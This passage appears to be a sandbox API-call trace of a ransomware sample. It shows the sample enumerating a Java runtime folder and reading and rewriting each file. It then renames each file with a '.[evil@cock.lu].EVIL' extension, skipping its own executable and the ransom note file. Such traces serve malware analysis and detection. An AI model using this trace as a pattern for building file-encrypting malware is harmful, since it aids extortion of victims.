lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.579] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3e60, lpOverlapped=0x0) returned 1 [0091.579] CloseHandle (hObject=0x1a4) returned 1 [0091.579] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.579] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.579] __uncaught_exception () returned 0x84b1160800 [0091.579] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.580] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java-rmi.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java-rmi.exe.[evil@cock.lu].evil")) returned 1 [0091.580] ??_V@YAXPEAX@Z () returned 0x1 [0091.584] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe", dwFileAttributes=0x0) returned 0 [0091.584] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.584] wcsstr (_Str="java.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.584] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll") returned 48 [0091.584] wcscmp (_String1="java.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.584] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java.dll") returned 0x0 [0091.584] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll") returned 0x30 [0091.584] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.586] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x27040, lpOverlapped=0x0) returned 1 [0091.589] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.589] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.589] _errno () returned 0x84b1160840 [0091.589] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.589] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x27060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x27060, lpOverlapped=0x0) returned 1 [0091.590] CloseHandle (hObject=0x1a4) returned 1 [0091.590] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.590] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.590] __uncaught_exception () returned 0x84b1160800 [0091.590] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.590] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.dll.[evil@cock.lu].evil")) returned 1 [0091.591] ??_V@YAXPEAX@Z () returned 0x1 [0091.594] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.dll", dwFileAttributes=0x0) returned 0 [0091.594] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.594] wcsstr (_Str="java.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.594] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe") returned 48 [0091.594] wcscmp (_String1="java.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.594] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java.exe") returned 0x0 [0091.594] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe") returned 0x30 [0091.594] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.596] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x32840, lpOverlapped=0x0) returned 1 [0091.603] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.603] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.604] _errno () returned 0x84b1160840 [0091.604] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.604] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x32860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x32860, lpOverlapped=0x0) returned 1 [0091.604] CloseHandle (hObject=0x1a4) returned 1 [0091.605] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.605] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.605] __uncaught_exception () returned 0x84b1160800 [0091.605] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.605] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java.exe.[evil@cock.lu].evil")) returned 1 [0091.606] ??_V@YAXPEAX@Z () returned 0x1 [0091.608] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe", dwFileAttributes=0x0) returned 0 [0091.608] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.608] wcsstr (_Str="JavaAccessBridge-64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.608] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll") returned 63 [0091.608] wcscmp (_String1="JavaAccessBridge-64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.608] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="JavaAccessBridge-64.dll") returned 0x0 [0091.608] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll") returned 0x3f [0091.608] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.610] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x22c40, lpOverlapped=0x0) returned 1 [0091.631] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.631] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.631] _errno () returned 0x84b1160840 [0091.632] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x22c60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x22c60, lpOverlapped=0x0) returned 1 [0091.632] CloseHandle (hObject=0x1a4) returned 1 [0091.632] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.633] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.633] __uncaught_exception () returned 0x84b1160800 [0091.633] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.633] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaaccessbridge-64.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javaaccessbridge-64.dll.[evil@cock.lu].evil")) returned 1 [0091.633] ??_V@YAXPEAX@Z () returned 0x1 [0091.636] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\JavaAccessBridge-64.dll", dwFileAttributes=0x0) returned 0 [0091.636] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.636] wcsstr (_Str="javacpl.cpl", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.636] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl") returned 51 [0091.636] wcscmp (_String1="javacpl.cpl", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.636] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javacpl.cpl") returned 0x0 [0091.636] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl") returned 0x33 [0091.636] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.638] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2d800, lpOverlapped=0x0) returned 1 [0091.672] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.672] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.672] _errno () returned 0x84b1160840 [0091.672] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.672] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2d820, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2d820, lpOverlapped=0x0) returned 1 [0091.673] CloseHandle (hObject=0x1a4) returned 1 [0091.673] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.673] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.673] __uncaught_exception () returned 0x84b1160800 [0091.673] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.674] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.cpl"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.cpl.[evil@cock.lu].evil")) returned 1 [0091.674] ??_V@YAXPEAX@Z () returned 0x1 [0091.677] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl", dwFileAttributes=0x0) returned 0 [0091.677] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.677] wcsstr (_Str="javacpl.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.677] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe") returned 51 [0091.677] wcscmp (_String1="javacpl.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.677] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javacpl.exe") returned 0x0 [0091.677] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe") returned 0x33 [0091.677] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.679] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x13840, lpOverlapped=0x0) returned 1 [0091.682] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.682] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.682] _errno () returned 0x84b1160840 [0091.682] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.682] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x13860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x13860, lpOverlapped=0x0) returned 1 [0091.683] CloseHandle (hObject=0x1a4) returned 1 [0091.683] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.683] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.683] __uncaught_exception () returned 0x84b1160800 [0091.683] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.683] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javacpl.exe.[evil@cock.lu].evil")) returned 1 [0091.684] ??_V@YAXPEAX@Z () returned 0x1 [0091.689] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe", dwFileAttributes=0x0) returned 0 [0091.689] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.689] wcsstr (_Str="javafx_font.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.689] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll") returned 55 [0091.689] wcscmp (_String1="javafx_font.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.689] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javafx_font.dll") returned 0x0 [0091.689] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll") returned 0x37 [0091.689] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.691] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x10e40, lpOverlapped=0x0) returned 1 [0091.698] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.698] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.698] _errno () returned 0x84b1160840 [0091.698] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x10e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x10e60, lpOverlapped=0x0) returned 1 [0091.698] CloseHandle (hObject=0x1a4) returned 1 [0091.698] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.698] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.698] __uncaught_exception () returned 0x84b1160800 [0091.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.699] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font.dll.[evil@cock.lu].evil")) returned 1 [0091.699] ??_V@YAXPEAX@Z () returned 0x1 [0091.702] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font.dll", dwFileAttributes=0x0) returned 0 [0091.702] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.702] wcsstr (_Str="javafx_font_t2k.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.702] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll") returned 59 [0091.702] wcscmp (_String1="javafx_font_t2k.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.702] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javafx_font_t2k.dll") returned 0x0 [0091.702] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll") returned 0x3b [0091.702] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.704] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x83640, lpOverlapped=0x0) returned 1 [0091.758] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.758] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.758] _errno () returned 0x84b1160840 [0091.759] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.759] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x83660, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x83660, lpOverlapped=0x0) returned 1 [0091.761] CloseHandle (hObject=0x1a4) returned 1 [0091.761] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.761] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.761] __uncaught_exception () returned 0x84b1160800 [0091.761] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll.[evil@cock.lu].evil")) returned 1 [0091.762] ??_V@YAXPEAX@Z () returned 0x1 [0091.765] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_font_t2k.dll", dwFileAttributes=0x0) returned 0 [0091.765] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.765] wcsstr (_Str="javafx_iio.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.765] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll") returned 54 [0091.765] wcscmp (_String1="javafx_iio.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javafx_iio.dll") returned 0x0 [0091.765] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll") returned 0x36 [0091.765] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_iio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.767] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1f440, lpOverlapped=0x0) returned 1 [0091.780] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.781] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.781] _errno () returned 0x84b1160840 [0091.781] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.781] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1f460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1f460, lpOverlapped=0x0) returned 1 [0091.781] CloseHandle (hObject=0x1a4) returned 1 [0091.781] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.782] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.782] __uncaught_exception () returned 0x84b1160800 [0091.782] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.782] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_iio.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\javafx_iio.dll.[evil@cock.lu].evil")) returned 1 [0091.782] ??_V@YAXPEAX@Z () returned 0x1 [0091.785] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\javafx_iio.dll", dwFileAttributes=0x0) returned 0 [0091.785] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 